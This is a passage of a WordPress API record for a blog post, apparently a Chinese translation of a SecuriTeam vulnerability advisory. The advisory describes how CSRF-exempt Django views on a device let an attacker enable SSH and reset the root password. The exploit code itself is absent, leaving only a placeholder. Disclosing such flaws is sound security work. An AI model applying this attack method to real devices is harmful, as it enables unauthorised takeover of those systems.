\u8bf7\u6ce8\u610f\uff0c\u8fd9\u4e24\u4e2aviews\u90fd\u5305\u542bcsrf_exempt decorator\uff0c\u5b83\u4f1a\u7981\u7528Django\u7684\u9ed8\u8ba4\u5f00\u542f\u7684CSRF\u4fdd\u62a4\u3002 \u56e0\u6b64\uff0c\u8fd9\u4e9b\u95ee\u9898\u53ef\u4ee5\u901a\u8fc7\u8de8\u7ad9\u8bf7\u6c42\u4f2a\u9020\u6765\u8fdb\u884c\u5229\u7528\u3002 \u6f0f\u6d1e\u8bc1\u660e \u4e0b\u9762\u7684\u6f0f\u6d1e\u9a8c\u8bc1\u4ee3\u7801\u5c06\u5c1d\u8bd5\u542f\u7528SSH\u670d\u52a1\uff0c\u5e76\u66f4\u6539root\u5bc6\u7801\u3002 \u5982\u679c\u6210\u529f\uff0c\u5219\u53ef\u4ee5\u4f7f\u7528\u65b0\u5bc6\u7801\u901a\u8fc7SSH\u767b\u5f55\u8bbe\u5907\u3002 
[crayon-5a666358f08ae242951493\/]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[15774,11851,10757],"class_list":["post-11198","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-chinese-translation","tag-remote-command-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11198","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11198"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11198\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11198"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11198"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11198"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}